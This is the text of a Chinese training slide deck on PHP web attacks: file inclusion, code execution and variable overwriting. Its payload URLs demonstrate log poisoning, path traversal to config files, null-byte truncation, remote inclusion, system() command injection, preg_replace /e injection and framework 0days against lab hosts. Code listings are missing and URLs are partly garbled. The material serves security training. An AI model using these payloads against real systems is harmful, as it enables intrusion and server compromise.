Web渗透测试系列-X-PHP特定攻击课件.pptx

1、Web渗透测试系列_X_PHP特定攻击1.整体框架2.文件包含3.代码执行4.变量覆盖5.总结培训提纲整体框架概述php特定攻击主要包括：文件包含、代码执行、变量覆盖三大部分： 文件包含：即服务器端利用php语句包含一个新的文件时且应用程序对用户输入过滤不当，从而导致该文件作为php代码执行的一种漏洞。 代码执行：即用户端通过向服务器某些可执行代码的危险函数传恶意递代码且应用程序对用户输入过滤不当，从而导致传入的代码在服务器端执行的一种漏洞。 变量覆盖：即用户通过控制输入的变量名及变量值来对服务器端代码中的同名变量进行覆盖，从而导致服务器根据用户输入执行的一种漏洞。Php特定攻击框架图文件包含

2、简介本地文件包含：即服务器端包含用户可控的本地文件且服务器端对用户提交的参数过滤不当，以此来获服务器端敏感信息。 远程文件包含：与本地文件包含类似，区别在于包含文件所在位置的不同，本地文件包含包含的文件在用户访问的服务器端本地，而远程文件包含包含文件重定向到另一个服务器。本地文件包含攻击原理流程图解实验例子寻找漏洞判断open_basedir是否设置探测利用漏洞防御测试工具攻击原理即打开并包含用户可控的本地文件且服务器端没有对用户提交的参数做过滤或者过滤不当，以此方法来获服务器端敏感信息或者服务器端脚本的源代码的一种技术。利用文件包含漏洞，需要满足以下两个条件： Included等函数通过动态

3、变量的方式引入需要包含的文件; 用户能够控制该动态变量。流程图解实验例子服务器端： 存在本地文件包含漏洞文件lfi.php代码如下(本节以此为例除非做特殊说明): ,其中include ()语句包含并运行指定文件，但当遇到错误的时候include只会产生警告，脚本将继续。客户端： 类似输入：http:/192.168.41.68/simple/lfi.php?file=fortest.txt 。寻找漏洞寻找漏洞主要从url中的.php文件名（如本例文件lfi.php）、参数名（如本例file参数）、参数值后缀（如本例参数值后缀.txt）三方面寻找： .php文件名也有一定的含义（比如文件查看等

4、），诸如folderview.php 、authldap.php、application.php、index.php等。 参数的名称一般有一定的含义（比如文件、路径等），诸如templatefolder、file、path、controller、errPagePath、includePath、base_path、folder、language、dir等。 参数值后缀一般为.txt、.doc、.php等文件后缀。判断open_basedir是否设置判断open_basedir是否设置分两种情况： 服务器返回错误信息，即php.ini 中开启display_errors开关，客户端请求服务器端产生

5、错误时，服务器端能够回显错误信息。 服务器不返回错误信息，即php.ini中关闭 display_errors开关，错误信息就不再回显。判断open_basedir是否设置服务器返回错误信息： 通过在url后面的参数值前不断添加./，直到跨越了open_basedir限定的目录即返回错误信息中出现“open_basedir restriction in effect”为止，否则可以断定没有设置open_basedir，本例中输入：file=./fortest.txt，页面返回如下判断open_basedir是否设置服务器返回错误信息： 从上图红框中信息可以看出文件包含失败，原因是文件不存在，继

6、续输入：file=././fortest.txt，页面返回如下图所示： 从上图红框中信息可以看出文件包含失败，原因是open_basedir的限制，因此可以断定设置了open_basedir。判断open_basedir是否设置服务器不返回错误信息： 此种情况只能假设open_basedir没有设置进行以下步骤，漏洞利用成功则open_basedir没有设置，否则设置了的可能性比较大。利用漏洞包含用户上传文件包含伪协议包含日志文件包含/proc/self/environ文件包含上传的临时文件包含session文件包含其它应用创建的文件利用截断包含用户上传文件原理 包含用户上传的文件最好理解，这

7、也是最简单的一种方法，用户上传的文件内容中如果包含了php代码，如果服务器没有过滤或者过滤不全那么这些代码被include()等包含文件函数加载后将会执行。利用局限性 被测试网站必须存在有上传页面且该页面具有上传功能，诸如上传图片、文档页面。 必须获知上传文件在服务器端的路径（该限制在上传文档详细研究，本实验假设指定上传文件在服务器端的路径）。包含用户上传文件利用步骤 首先，准备一个包含php的txt文件，本例为fortest.txt文件，如下 其次，上传准备的txt文档即本例中fortest.txt文件，本实验假如事先直到上传文件在服务器端的绝对路径，如下图红框处包含用户上传文件利用步骤 接

8、着，包含fortest.txt文档并执行文件中的php代码，本例输入：file=upload/fortest.txt，可以得出服务器执行了fortest.txt中的php代码，因此以探知存在本地文件包含漏洞，具体返回如下：包含用户上传文件利用步骤 最后，接下来可以修改fortest.txt文档的代码，构造自己想要的攻击，具体详见web shell部分。包含伪协议原理 包含伪协议即通过伪协议包含一些恶意代码，从而在服务器端执行。伪协议不同于真实存在的协议如http:/，https:/，ftp:/，而是为关联应用程序而使用的，常见的伪协议包括data 、php等利用局限性 服务器端支持对应的伪协议

9、 php.ini中allow_url_include设置为on包含伪协议利用步骤 首先，Data协议用于访问数据，使用格式为：data:;base64,例如本例输入：file=data:text/plain,%00，从返回页面可以探知存在本地文件包含漏洞，具体如下：包含伪协议利用步骤 其次，接下来可以修改file=data:text/plain,%00中的代码，构造需要的攻击，具体详见web shell部分。包含日志文件原理 包含日志文件即通过向日志文件导入恶意代码，接着服务器端应用程序在包含此日志文件，最终导致恶意代码执行。利用局限性 如果网站的访问量大的话，日志文件很可能很大，当包含一个这

10、么大的文件的时候，php进程可能会僵死，但web sever往往会滚动日志或每天生成一个新的日志文件，因此在凌晨时包含日志文件，将提高攻击成功性，因为此时的日志文件可能会非常小，同时由于默认的error.log记录信息不全，无法包含植入的恶意代码，因此选择包含access.log。包含日志文件利用步骤 首先，读取http.conf文件，找到日志文件所在的目录。http.conf一般会存在apache的安装目录下，在readhat系列里默认安装的可能为/etc/httpd、conf/httpd.conf；在windows系统下默认安装在conf/httpd.conf，例如输入：输入： file=

11、./conf/httpd.conf，可以得知本实验error.log和access.log分别在logs/access.log、logs/error.log，具体如下红框处：包含日志文件利用步骤 其次，把恶意代码植入access.log日志，直接通过url把恶意代码植入access.log日志时候，日志中显示的一些诸如空格、单引号等字符会被编码，这样的话包含日志文件不会执行，通过查询相关资料获知在一般情况下，就是借助代理工具，在发送的http请求中确保不包含connection头，那么请求原封不动的写入web日志，不会进行http编码。因此使用burpsuite工具截获请求，并把恶意代码植入请

12、求中，如下图红框处：包含日志文件利用步骤 再次，查看服务器端access.log日志，可以得出access.log日志文件包含了植入的恶意代码，如下图红框处包含日志文件利用步骤 最后，包含植入的恶意代码，输入：s=phpinfo();&file=./logs/access.log，从返回结果可以探知存在漏洞，具体如下 可以修改植入日志的代码，构造自己想要的代码进行进一步攻击，具体详见web shell部分包含/proc/self/environ文件包含/proc/self/environ文件的限制条件是必须得有/proc/self/environ的访问权限，系统默认情况下是不允许对enviro

13、n文件进行访问的，因此该方法不大实用，该文件ubantu下截图如下：包含上传临时文件php创建的上传临时文件，往往处于php允许访问的目录范围内，该临时文件的文件名是随机的，攻击者必须准确猜测出该文件名才能够成功利用该漏洞，因此文件名必须借助暴力破解，但临时文件具有时效性，过一段时间会自动销毁，因此实用性也不大。包含session文件包含session文件的条件比较苛刻，它需要攻击者能够控制部分session文件的内容，一般情况下远程用户是无法修改服务器端session文件的，因此该方法仅仅是理论具有可行性，实用性不强，因此这里不做叙述。包含其它应用创建的文件包含其它应用创建的文件包括比如数据

14、库文件、缓存文件、应用日志等，需要具体情况具体分析，这里就不做叙述。利用截断以上例子不使用截断技术，然而现实情况该技术经常遇到，本实验服务器端代码为：，常见截断技术如下： 利用%00截断，同时Php.ini中magic_quotes_gpc必须为off且受php版本限制(php5.4之后修改)。 利用操作系统对目录最大长度限制截断，目录字符串，在windows最大下为256个字节、linux下最大为4096个字节，超过最大值后的字符会被丢弃。linux下使用使用./、/，例如输入：file= upload/fortest.txt./././././././././././././././，wi

15、ndows下使用.、./、/，例如输入：file= upload/fortest.txt .。利用截断利用%00截断 首先，例如输入：file=upload/fortest.txt ，服务器端实际被包含文件实际是fortest.txt.php，因此不能执行，具体如下图红框处利用截断利用%00截断 接着，输入：file=upload/fortest.txt%00，从返回结果易知%00截断了后面的.php，具体如下图利用截断利用操作系统对目录最大长度限制截断 这里以windows为例，首先输入：file=upload/fortest.txt，从返回页面可以得出结论，当输入的参数fortest.tx

16、t，被包含文件实际是fortest.txt.php，具体如下图红框处：利用截断利用操作系统对目录最大长度限制截断 接着输入：http:/192.168.41.68/simple/lfi.php?file=upload/fortest.txt/：，返回结果易知截断了.php，具体如下图，防御目前防火墙中有防御本地文件包含漏洞的特征，同时结合0day分析提取白名单作为补充。测试工具本地文件包含测试工具包括： Fimap lfimap fimap使用命令格式如：python fimap.py -u 目标网站，例如输入：python fimap.py u http:/192.168.41.68/sim

17、ple/lfi.php?file=upload/fortest.txt，从返回页面可以得出探测出了漏洞，具体如下图红框处：lfimap使用命令格式如：python lfimap.py t “目标网站”-o report.html， 例如输入：python lfimap.py -t “ http:/192.168.202.134/lfi.php?file=fortest.txt” -o report.html，从返回页面可以得出file参数存在漏洞，具体如下图红框处：lfimap也可以从生成报告文件report.html获知漏洞信息，具体如下红框处：远程文件包含攻击原理流程图解实验例子寻找漏洞判

18、断allow_url_include是为on漏洞利用防御测试工具攻击原理远程文件包含的原理与本地文件包含原理类似，区别在于包含文件所在位置的不同。流程图解实验例子服务器端： 服务器端有远程文件包含漏洞文件rfi.php代码如下 (本节以此为例除非做特殊说明): ,其中include ()语句包含并运行指定文件，但当遇到错误的时候include只会产生警告，脚本将继续。客户端： 类似输入：http:/192.168.41.68/simple/lfi.php?file= http:/192.168.41.67/fortest.txt寻找漏洞寻找漏洞主要从url中的.php文件名（如本例文件rfi.

19、php）、参数名（如本例file参数）、参数值后缀（如本例参数值后缀.txt）三方面寻找： .php文件名也有一定的含义（比如枚举参数、参数错误页面等），诸如layoutParser.php 、pageDescriptionObject.php 、errormsg.php等。 参数的名称一般有一定的含义（比如路径、目录等），诸如forumspath 、LibDir、theme_directory等。 参数值后缀一般为.txt、.doc、.php等文件后缀。判断allow_url_include是否为on判断allow_url_include是否为on分两种情况： 服务器返回错误信息，即php.

20、ini 中开启display_errors开关，客户端请求服务器端产生错误时，服务器端能够回显错误信息。 服务器不返回错误信息，即php.ini中关闭 display_errors开关，错误信息就不再回显。判断allow_url_include是否为on服务器返回错误信息情况 在参数后面随便输入一个远程文件，如果页面返回信息提示“URL file-access is disabled in the server configuration”出错信息，可以判断allow_url_include设置为off，否则为on。例如输入：file=http:/192.168.41.67/fortest.t

21、xt?，从返回页面提示“URL file-access is disabled in the server configuration”出错信息，可以判断allow_url_include设置的为off，具体如下图红框处判断allow_url_include是否为on服务器不返回错误信息情况 服务器不返回详细错误信息情况，即php.ini中关闭display_errors开关错误就不回显了，此时只能假设allow_url_include为on进行以下步骤，漏洞利用成功则allow_url_include为on，否则为off的可能性比较大。利用漏洞首先，指定远程文件路径，例如：http:/192

22、.168.41.68/simple/lfi.php?接着，输入：file=http:/192.168.41.67/fortest.txt，从返回页面易知得出服务器执行了远程服务器192.168.41.67上fortest.txt中的php代码，因此可以探知存在远程文件包含漏洞，具体如下：利用截断以上例子不使用截断技术，然而现实情况该技术经常遇到，本实验服务器端代码为：，除了使用的%00、利用操作系统对目录最大长度限制两种截断技术外，远程文件包含有一种专属的截断技术即使用问号。利用截断利用问号截断 首先，输入：file=http:/192.168.41.67/fortest.txt，从返回页面可

23、以看出实际包含的远程文件是http:/192.168.41.67/fortest.txt.php，因此提示该文件不存在，具体如下：利用截断利用问号截断 接着，file=http:/192.168.41.67/fortest.txt?，从返回页面可以得出结论问号后面的被截断了，具体如下防御目前防火墙中有防御远程文件包含漏洞的特征，但由于该攻击特征与正常应用很难分开，该部分有些特征默认放行，因此应该分析0day提取白名单作为补充。测试工具fimap 具体详见本地文件包含测试工具部分。代码执行代码执行攻击原理攻击实例防御0day举例攻击原理代码执行:即php代码注入，即攻击者利用url向服务器端某些

24、能执行代码的函数传递恶意代码且服务器端没有过滤或者过滤不当，从而导致代码在服务器端执行。代码执行需要满足三个条件 服务器端存在执行代码的危险函数； 用户能够控制函数的输入； 服务器端对用户输入没有过滤或者过滤不严攻击实例Php代码执行分类主要有以下几类，具体如下： 危险函数 文件包含 动态函数执行 curl syntax（花括号） 回调函数 正则匹配代码注入攻击实例危险函数 常见的危险函数包括直接执行代码的函数（eval、assert、system、exec、shell_exec、passthru、pcntl_exec等）、unserialize函数、写入文件函数（file_put_conte

25、nts、fwrite、fputs等）等，一旦用户控制了函数的输入，即可导致代码执行，这里以unserialize函数为例攻击实例危险函数 服务器端unserialize.php代码如下：攻击实例危险函数 客户端输入：http:/192.168.41.68/simple/unserialize.php?saved_code=O:7:“Example”:1:s:3:“var”;s:10:“phpinfo();”;，其中saved_code参数为php序列化后的结果，从返回页面易知saved_code参数的代码在服务器端执行了，具体如下：攻击实例文件包含 文件包含漏洞也是执行代码注入的一种，在存在文

26、件包含的文件中植入php代码，通过文件包含即可执行php代码，关于文件包含详见文件包含部分。攻击实例动态函数执行 动态函数执行即用户通过向服务器传递适当的参数且服务器端过滤不当，最终服务器端自定义的函数得以执行。攻击实例动态函数执行 服务器端dt.php代码如下：攻击实例动态函数执行 客户端输入：http:/192.168.41.68/simple/unserialize.php?dyn_func=system&argument=ls，从返回页面易知dyn_func参数的代码在服务器端执行了，具体如下：攻击实例curl syntax（花括号） php的curl syntax也能导致代码执行，它

27、能执行花括号间的代码，当用户向服务传递适当的参数且该参数恰好在花括号之间，最终可能导致该参数在服务器端的执行。 服务器端curly.php代码如下：攻击实例curl syntax（花括号） 客户端输入：http:/192.168.202.134/curly.php?p=phpinfo，从返回页面易知p参数的代码在服务器端执行了，具体如下： 攻击实例回调函数 即通过在某些函数的参数调用的函数，很多函数都可以执行回调函数，当用户可以控制回调函数的时候，通过url传递参数将导致代码执行。 常见的回调函数包括：array_map、usort、uasort、uksort、array_filter、arr

28、ay_reduce、array_diff_uassoc、array_diff_ukey、array_udiff、array_udiff_assoc、array_udiff_uassoc、array_intersect_assoc、array_intersect_uassoc、array_uintersect等。攻击实例回调函数 服务器端hd.php代码如下：攻击实例回调函数 客户端输入：http:/192.168.202.134/curly.php?callback=phpinfo，从返回页面易知callback参数的代码在服务器端执行了，具体如下： 攻击实例正则匹配代码注入 preg_rep

29、lace函数的第一个参数如果存在/e模式修饰符（如果这个修饰符设置了，单引号、双引号、反斜线()和 NULL 字符在 后向引用替换时会被用反斜线转义），则允许代码执行。 preg_replace函数语法为：mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject , int $limit = -1 , int &$count )，具体用途是搜索subject中匹配pattern的部分， 以replacement进行替换。 根据注入位置不同分为：注入pattern 参数、注入replacement 参数以及

30、注入subject 参数。攻击实例正则匹配代码注入-注入pattern 参数 服务器端preg1.php代码如下： 客户端输入：http:/192.168.202.134/preg1.php?reg=%3C/php%3E/e，从返回页面易知reg参数的代码在服务器端执行了，具体如下： 攻击实例正则匹配代码注入-注入replacement 参数 服务器端preg2.php代码如下： 客户端输入：http:/192.168.202.134/preg2.php?h=phpinfo()，从返回页面易知h参数的代码在服务器端执行了，具体如下： 攻击实例正则匹配代码注入-注入subject 参数 服务器端

31、preg3.php代码如下： 客户端输入：http:/192.168.202.134/preg3.php?h=phpinfo()，从返回页面易知h参数的代码在服务器端执行了，具体如下： 防御防火墙针对代码执行漏洞提取了一些通过tcp负载传递危险函数等黑名单特征，但实际攻击中通过这种方法传递的函数在服务器端一般情况下不会被执行，因此该部分提取黑名单特征比较困难。目前有两种主流的防御方法是：分析0day提取白名单特征、对源代码进行白盒审计，因此应该结合提取0day白名单作为补充。0day举例本0day举例ThinkPHP一个任意代码执行漏洞，问题代码如下：上述第125行代码中，使用了preg_re

32、place的/e参数，由5.2.6小节易知如果用了这个参数，preg_replace第二个参数就会被当做php代码执行，接下来具体分析。0day举例preg_replace的第二个参数中，利用php代码给数组动态赋值，这里使用了双引号，而双引号中的php变量语法又是能够被解析执行的，因此只要第二个参数中有用户可以控制的参数，那么就可以方便的注入需要的恶意代码，实际上第二个参数使用了后向引用，因此这里可控参数为$depr。接下来跟踪变量$depr来源，跟踪到第100行代码，这里使ThinkPHP框架的C方法获取附件参数中的值，因此只要类似输入：http:/192.168.202.134/ ind

33、ex.php/module/aciton/param1/$phpinfo()，第100行代码会使用C方法方法获取url中参数$phpinfo()到第125行代码第二个参数中，这样代码就执行了。变量覆盖简介变量覆盖漏洞：即用户通过控制输入的变量名及变量值来对服务器端代码中的同名变量进行覆盖，来达到攻击的目的，其中包括以同名变量形式覆盖、以全局变量数组形式覆盖漏洞和函数变量覆盖漏洞。 变量覆盖以同名变量形式覆盖以全局变量数组形式覆盖函数变量覆盖防御0day举例以同名变量形式覆盖攻击原理 之所以存在全局覆盖漏是因为php中使用变量并不需要初始化，因此当register_globals=on时，变量来

34、源可能来自一些用户可控制的变量，比如页面的表单数据、cookie等，这样漏洞就产生了。以同名变量形式覆盖攻击实例 服务器端register1.php代码如下：以同名变量形式覆盖攻击实例 客户端：当register_globals为off时，输入：http:/192.168.41.68/simple/register1.php?auth=1，从返回页面可以看出auth变量没有赋值，具体如下：以同名变量形式覆盖攻击实例 当register_globals为on时，输入：http:/192.168.41.68/simple/register1.php?auth=1，从返回页面可以看出auth变量变量

35、被覆盖掉赋值为1了，具体如下：以全局变量数组形式覆盖攻击原理 以全局变量数组形式覆盖与以同名变量形式覆盖的不同之处是它通过url、表单传入的变量是以全局变量数组形式，这样单纯使用类似unset()函数不能销毁全局变量，这样漏洞就产生了。 全局变量数组包括：$_GET、$_POST、$_COOKIE、$_SESSION、$_ENV、$_SERVER、$_FILES、$_REQUEST、$GLOBALS。以全局变量数组形式覆盖攻击实例 服务器端register2.php代码如下：以全局变量数组形式覆盖攻击实例 客户端：当register_globals为off时，变量得不到覆盖，这里仅仅介绍reg

36、ister_globals为on时，输入： http:/192.168.41.68/simple/register2.php?GLOBALSauth=1，从返回结果显示auth变量再次被覆盖，主要是因为unset()默认只会销毁局部变量，要销毁全局变量必须使用$ GLOBALS，具体如下：函数变量覆盖攻击原理 函数变量覆盖漏洞主要是由于某些函数某个参数处理不当导致覆盖服务器端某个参数，从而发生变量覆盖。函数变量覆盖攻击实例 服务器端extract.php代码如下：函数变量覆盖攻击实例 客户端：当register_globals为off时，变量得不到覆盖，这里仅仅介绍register_globa

37、ls为on时，输入： http:/192.168.41.68/simple/extract.php?auth=1，从返回结果显示auth变量再次被覆盖，具体如下：防御针对以全局变量数组形式覆盖漏洞提取了一些通过tcp负载传递全局变量数组等黑名单特征，因此该漏洞能够进行防御。针对函数覆盖漏洞提取了一些通过tcp负载传递易受函数变量覆盖漏洞影响的函数的黑名单特征，但实际攻击中通过这种方法传递的函数在服务器端一般情况下不会被执行，因此应该结合提取0day白名单作为补充。0day举例本0day举例Stcms某段程序中因变量覆盖导致的一个sql注入漏洞，缺陷编号为WooYun-2012-10198，具体如下：0day举例接以上代码：其中where没有初始化导致可以覆盖where变量执行自己想要的sql语句，输入：http:/localhost/stcms_html/member/u.php?action=list&where=sql总结总结 本文对php特定攻击进行了详细分析，具体如下： 文件包含部分总结出了完整的渗透流程。 代码漏洞执行以及变量覆盖漏洞的发现主要利用白盒审计，因此这两部分主要结合代码讲解攻击原理。